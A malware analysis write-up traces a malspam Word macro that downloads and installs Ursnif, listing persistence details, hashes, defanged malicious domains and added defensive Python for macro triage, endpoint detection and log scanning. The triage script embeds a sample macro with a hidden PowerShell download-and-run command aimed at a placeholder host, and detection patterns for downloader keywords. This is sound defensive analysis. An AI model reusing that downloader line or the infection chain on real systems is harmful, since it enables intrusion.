Malspam Distributing Ursnif (Gozi ISFB)

A user received malspam with a .doc attachment. Static analysis of the file showed it was a Microsoft Word 2007+ document with an embedded macro located in vbaProject.bin.

The malware authors trick victims into enabling macros (Enable Content) and, to better evade sandboxes, place the code in the AutoClose auto-macro so that it only runs once the document has been closed.
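As an added example, not code from the post, the following Python triage script shows the two things a defender wants to pull out of a dumped macro before anything is detonated: which auto-execution entry point it uses (AutoClose here, which a sandbox that opens the file and never closes it will miss) and which capabilities sit behind it. It assumes the VBA source has already been extracted from vbaProject.bin (for instance with olevba); the sample macro, its placeholder URL and the indicator names are constructed for the example. The small string folder resolves Chr() calls and "a" & "b" concatenations so that a keyword such as powershell is still found when it has been split up.

```python
import re

# Constructed sample of decompressed VBA source that imitates the pattern the post
# describes (an AutoClose entry point launching a hidden downloader). It is not the
# macro from the analysed document; the URL is a placeholder.
SAMPLE_VBA = '''
Attribute VB_Name = "ThisDocument"
Sub AutoClose()
    Dim s As String
    s = Chr(112) & Chr(111) & "wershell -w hidden -c " & Replace("IEX (New-Object Net.WebClient).DownloadString('hxxp://example.invalid/x')", "hxxp", "http")
    CreateObject("WScript.Shell").Run s, 0
End Sub
'''

# Office auto-execution entry points: code in these procedures runs with no click beyond
# "Enable Content". AutoClose fires when the document is closed, which is why a sandbox
# that opens the file and times out without closing it can miss the behaviour.
AUTO_EXEC = re.compile(
    r"\b(Auto(Open|Close|Exec|Exit|New)|Document_(Open|Close)|Workbook_(Open|BeforeClose))\b", re.I)

# Capabilities typically chained behind such an entry point (names are this example's own).
INDICATORS = {
    "shell_execution": re.compile(r"\bShell\b|WScript\.Shell|\.Run\b|\.Exec\b", re.I),
    "object_creation": re.compile(r"\bCreateObject\s*\(", re.I),
    "powershell": re.compile(r"powershell", re.I),
    "downloader": re.compile(r"DownloadString|DownloadFile|XMLHTTP|WinHttp", re.I),
    "string_obfuscation": re.compile(r"\bChrW?\s*\(|\bStrReverse\b|\bReplace\s*\(", re.I),
    "hidden_window": re.compile(r"-w(indowstyle)?\s+hidden|\.Run\s+[^,]+,\s*0\b", re.I),
}


def fold_strings(line):
    """Resolve Chr()/ChrW() calls and join "a" & "b" literal concatenations so that
    keyword matching sees the string the macro would actually build at run time.
    (Chr(34), a double quote, is deliberately not special-cased here.)"""
    line = re.sub(r"\bChrW?\s*\(\s*(\d+)\s*\)",
                  lambda m: '"' + chr(int(m.group(1))) + '"', line, flags=re.I)
    # Split into alternating quoted / unquoted chunks (an unmatched trailing quote is dropped).
    tokens = re.findall(r'"[^"]*"|[^"]+', line)
    folded, i = [], 0
    while i < len(tokens):
        tok = tokens[i]
        if (tok.startswith('"') and i + 2 < len(tokens)
                and re.fullmatch(r"\s*&\s*", tokens[i + 1]) and tokens[i + 2].startswith('"')):
            tokens[i + 2] = tok[:-1] + tokens[i + 2][1:]   # "po" & "wer" -> "power", then re-examine
            i += 2
            continue
        folded.append(tok)
        i += 1
    return "".join(folded)


def triage_vba(source, deobfuscate=True):
    """Return auto-exec entry points and indicator hits, keyed by 1-based line number."""
    findings = {"auto_exec": [], "indicators": {}}
    for lineno, raw in enumerate(source.splitlines(), 1):
        line = fold_strings(raw) if deobfuscate else raw
        for m in AUTO_EXEC.finditer(line):
            findings["auto_exec"].append((lineno, m.group(0)))
        for name, pat in INDICATORS.items():
            # Obfuscation markers live in the raw text; behavioural keywords may only appear once folded.
            if pat.search(raw) or pat.search(line):
                findings["indicators"].setdefault(name, []).append(lineno)
    return findings


def verdict(findings):
    """Auto-exec plus execution or download capability is the combination that matters."""
    hits = findings["indicators"].keys()
    if findings["auto_exec"] and hits & {"shell_execution", "powershell", "downloader"}:
        return "high"
    return "medium" if findings["auto_exec"] or hits else "low"


if __name__ == "__main__":
    result = triage_vba(SAMPLE_VBA)
    print(verdict(result), result)
```

Running the sample with deobfuscate=False shows why the folding step matters: the downloader call is still caught on the raw text, but the split "po" & "wershell" literal hides the interpreter name until the concatenation is resolved.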

[Image: image file from the document]



Dynamic analysis of the code via a debugger quickly shows the string we’re looking for:

[Image: debugger screenshot]

After closing the document, we can see the GET request to sukiebuchnieohuelivobos[.]com/AFK/lima.php?utma=versusf:

[Image: Fiddler output]

The User-Agent string used for this request was “Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; Tablet PC 2.0; InfoPath.3)”. Furthermore, you can see the script returned by the remote server in the image above.

Decoding it shows the following PowerShell command:


The GET requests are shown below:

[Image: GET requests]

The GET request for sukiebuchnieohuelivobos[.]com/AFK/versusf.pfx returns the malware payload:

[Image: hex dump of the payload showing the MZ header and the "cannot be run in DOS mode" stub]

The GET request for sukiebuchnieohuelivobos[.]com/s.php?id=versusf simply returned “tid=versusf”.

The GET request for cash4lcd[.]com/Stat.counter returned the following command:

[Image: PowerShell command returned by cash4lcd[.]com/Stat.counter]

This generated the GET request for workswell[.]at/images/1300.exe:

[Image: second payload]

Both payloads were downloaded to %AppData% and then detonated:


For persistence, 661.exe sets the autostart registry value “HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Appltdll”:


Process 661.exe then created a copy of itself at “C:\Users\<User>\AppData\Roaming\Microsoft\BtpamRes\BthTtons.exe”:

[Image: AppData\Roaming\Microsoft folder listing]

661.exe creates a .bat file in a folder under %Temp%, writes to it, and then starts cmd.exe. That cmd.exe reads the .bat file, spawns a child cmd.exe, and uses it to launch BthTtons.exe. BthTtons.exe eventually deletes 661.exe.
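The host-side chain described above (Word to PowerShell, an executable dropped under %AppData%, a Run value pointing into the profile, cmd.exe running a .bat from %Temp%, and a second-stage binary launched from AppData\Roaming\Microsoft) is a good fit for a handful of endpoint detection rules. Below is an added Python example, not code from the post, that runs those rules over constructed events shaped like Sysmon process-creation and registry-value-set records. PIDs, the user name, the exact paths and the data written to the Appltdll value are assumptions for the example; only the value name, the BtpamRes\BthTtons.exe location and the 661.exe name come from the write-up.

```python
import re
from collections import namedtuple

# Minimal stand-ins for Sysmon process-creation (event 1) and registry value-set (event 13)
# records. The events below are constructed to mirror the chain in the post; paths, PIDs,
# the user name and the Run value's data are assumptions, not telemetry from the analysis.
Proc = namedtuple("Proc", "pid ppid image cmdline")
RegSet = namedtuple("RegSet", "pid key data")

EVENTS = [
    Proc(100, 50, r"C:\Program Files\Microsoft Office\Office16\WINWORD.EXE", r'"WINWORD.EXE" /n malspam.doc'),
    Proc(101, 100, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe", "powershell -w hidden -c <downloader>"),
    Proc(102, 101, r"C:\Users\alice\AppData\Roaming\661.exe", r"C:\Users\alice\AppData\Roaming\661.exe"),
    RegSet(102, r"HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Appltdll",
           r"C:\Users\alice\AppData\Roaming\Microsoft\BtpamRes\BthTtons.exe"),
    Proc(103, 102, r"C:\Windows\System32\cmd.exe", r'cmd.exe /c "C:\Users\alice\AppData\Local\Temp\tmp1\run.bat"'),
    Proc(104, 103, r"C:\Windows\System32\cmd.exe",
         r'cmd.exe /c start "" "C:\Users\alice\AppData\Roaming\Microsoft\BtpamRes\BthTtons.exe"'),
    Proc(105, 104, r"C:\Users\alice\AppData\Roaming\Microsoft\BtpamRes\BthTtons.exe", "BthTtons.exe"),
    Proc(200, 50, r"C:\Windows\explorer.exe", "explorer.exe"),   # benign control event
]

OFFICE_APPS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
INTERPRETERS = {"powershell.exe", "cmd.exe", "wscript.exe", "cscript.exe", "mshta.exe"}
USER_WRITABLE = re.compile(r"\\(AppData|Temp)\\", re.I)       # locations any user can write to
RUN_KEY = re.compile(r"\\CurrentVersion\\Run(Once)?\\", re.I)  # classic autostart locations
TEMP_BAT = re.compile(r'\\Temp\\[^"]*\.bat\b', re.I)


def basename(path):
    return path.rsplit("\\", 1)[-1]


def detect(events):
    """Apply four rules derived from the observed chain and return (rule, pid) pairs."""
    procs = {e.pid: e for e in events if isinstance(e, Proc)}
    alerts = []
    for e in events:
        if isinstance(e, Proc):
            parent = procs.get(e.ppid)
            # Rule 1: an Office application starting a script interpreter.
            if (parent and basename(parent.image).lower() in OFFICE_APPS
                    and basename(e.image).lower() in INTERPRETERS):
                alerts.append(("office_spawns_interpreter", e.pid))
            # Rule 2: an executable running from a user-writable path (the dropped 661.exe, BthTtons.exe).
            if e.image.lower().endswith(".exe") and USER_WRITABLE.search(e.image):
                alerts.append(("exe_from_user_writable_path", e.pid))
            # Rule 3: cmd.exe executing a batch file staged under %Temp%.
            if basename(e.image).lower() == "cmd.exe" and TEMP_BAT.search(e.cmdline):
                alerts.append(("cmd_runs_temp_bat", e.pid))
        elif isinstance(e, RegSet):
            # Rule 4: a Run/RunOnce value whose data points back into the user profile.
            if RUN_KEY.search(e.key) and USER_WRITABLE.search(e.data):
                alerts.append(("run_key_points_to_user_writable_path", e.pid))
    return alerts


def lineage(events, pid):
    """Walk parent links back to the root so an alert on BthTtons.exe can be tied to Word."""
    procs = {e.pid: e for e in events if isinstance(e, Proc)}
    chain, seen = [], set()
    while pid in procs and pid not in seen:      # 'seen' guards against PID reuse loops
        seen.add(pid)
        chain.append(basename(procs[pid].image))
        pid = procs[pid].ppid
    return list(reversed(chain))


if __name__ == "__main__":
    for rule, pid in detect(EVENTS):
        print(f"{rule:40} pid={pid}  " + " -> ".join(lineage(EVENTS, pid)))
```

Each rule on its own produces some noise in a real estate (installers also run from %Temp%); the point of keeping the lineage is that a Word-rooted chain hitting three of the four rules is a far stronger signal than any single hit.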

Below is the process tree, which might give you a better understanding of what happened:

[Image: process tree]

Post-infection traffic shows follow-up GET requests:

[Image: post-infection GET requests]

These GET requests appear to download files associated with Tor functionality.

There is also this registry entry at HKCU\SOFTWARE\AppDataLow\Software\Microsoft\:

[Image: Registry Editor]

DNS queries and responses:

[Image: DNS queries and responses]

Some post-infection traffic:

[Image: port 443 traffic]

More post-infection traffic found in the VT report:

[Image: HTTP requests from the VirusTotal report]


SHA256: f0bdd862d6eced44b6f0a0a00681302994782275902c23a6be4baa1d4e98a8e6
File name: malspam.doc
Hybrid-Analysis report

SHA256: 041ad28cf8a6c03953910ea6dec3987ffd4daf729cce2a87e9bf68c480c0918e
File name: 62f5e05a.exe
Hybrid-Analysis report

SHA256: 0358ac37ad7a3bd29d19ff06d243666add9c2255bae1eb2bb32f0538440388c7
File name: 661.exe
Hybrid-Analysis report

Network Based IOCs:
  • sukiebuchnieohuelivobos[.]com – GET /AFK/lima.php?utma=versusf
  • sukiebuchnieohuelivobos[.]com – GET /AFK/versusf.pfx
  • sukiebuchnieohuelivobos[.]com – GET /s.php?id=versusf
  • cash4lcd[.]com – GET /Stat.counter
  • www.workswell[.]at – GET /images/1300.exe
  • www.dietaesaluteonline[.]it – GET /api/456.bin
  • – GET /p.png
  • – GET /assets/images//C_2F_2Bm.jpeg
  • – POST /assets/images//_2BHk.gif
  • – GET /include/p1.pif
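The network indicators above, together with the User-Agent string noted earlier, are most useful once they are turned into something that runs over proxy logs. As an added example (not from the post), the Python below keeps the hosts defanged exactly as listed, refangs them at match time, matches URI paths on their own because several hosts were not captured, and adds one generic check for GET requests to the file extensions that delivered executables in this chain. The log layout (timestamp, client, method, URL, status, quoted User-Agent) and the log lines themselves are constructed for the example.

```python
import re
from urllib.parse import urlsplit

# Indicators from the post, hosts kept defanged as written there. Hosts for several of the
# URIs were not captured, so URI paths are matched independently of the host.
IOC_HOSTS = ["sukiebuchnieohuelivobos[.]com", "cash4lcd[.]com",
             "www.workswell[.]at", "www.dietaesaluteonline[.]it"]
IOC_URIS = ["/AFK/lima.php", "/AFK/versusf.pfx", "/s.php", "/Stat.counter", "/images/1300.exe",
            "/api/456.bin", "/p.png", "/assets/images//C_2F_2Bm.jpeg",
            "/assets/images//_2BHk.gif", "/include/p1.pif"]
IOC_UA = ("Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; "
          ".NET4.0C; .NET4.0E; Tablet PC 2.0; InfoPath.3)")
PAYLOAD_EXT = {"exe", "pif", "pfx", "bin"}   # extensions that carried executables in this chain


def refang(host):
    return host.replace("[.]", ".").lower()


# Constructed proxy log lines in a simple 'ts client method url status "ua"' layout; not from the post.
SAMPLE_LOG = f'''
2019-01-01T12:00:01Z 10.0.0.5 GET http://sukiebuchnieohuelivobos.com/AFK/lima.php?utma=versusf 200 "{IOC_UA}"
2019-01-01T12:00:03Z 10.0.0.5 GET http://sukiebuchnieohuelivobos.com/AFK/versusf.pfx 200 "{IOC_UA}"
2019-01-01T12:00:04Z 10.0.0.7 GET http://www.example.com/index.html 200 "Mozilla/5.0 (Windows NT 10.0; Win64; x64) Firefox/64.0"
2019-01-01T12:00:09Z 10.0.0.9 GET http://cdn.example.net/assets/images//C_2F_2Bm.jpeg 200 "Mozilla/5.0 (Windows NT 10.0; Win64; x64) Firefox/64.0"
'''

LINE_RE = re.compile(r'^(?P<ts>\S+) (?P<client>\S+) (?P<method>\S+) (?P<url>\S+) '
                     r'(?P<status>\d{3}) "(?P<ua>[^"]*)"$')


def check_request(client, method, url, ua):
    """Return the list of reasons a single request is interesting (empty if none)."""
    parts = urlsplit(url)                         # no normalisation, so '//' in paths is preserved
    host, path = (parts.hostname or "").lower(), parts.path
    reasons = []
    if host in {refang(h) for h in IOC_HOSTS}:
        reasons.append("known_host")
    if path in IOC_URIS:
        reasons.append("known_uri")
    if ua == IOC_UA:
        reasons.append("known_ua")
    last = path.rsplit("/", 1)[-1]
    ext = last.rsplit(".", 1)[-1].lower() if "." in last else ""
    if method == "GET" and ext in PAYLOAD_EXT:
        reasons.append("payload_extension")
    return reasons


def scan_log(text):
    alerts = []
    for line in text.strip().splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue                              # skip malformed lines rather than abort the scan
        reasons = check_request(m["client"], m["method"], m["url"], m["ua"])
        if reasons:
            alerts.append({"client": m["client"], "url": m["url"], "reasons": reasons})
    return alerts


def clients_by_severity(alerts):
    """Collapse alerts per client; two or more independent reasons raise confidence."""
    seen = {}
    for a in alerts:
        seen.setdefault(a["client"], set()).update(a["reasons"])
    return {c: ("high" if len(r) >= 2 else "low") for c, r in seen.items()}


if __name__ == "__main__":
    hits = scan_log(SAMPLE_LOG)
    for a in hits:
        print(a["client"], a["url"], ",".join(a["reasons"]))
    print(clients_by_severity(hits))
```

A bare URI-path hit on an unknown host (the .jpeg line above) is worth a look but not an incident on its own; the same client fetching a known host with the observed User-Agent and then pulling a .pfx that is really a PE is the combination the write-up documents, and the severity roll-up reflects that.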


Password is “infected”
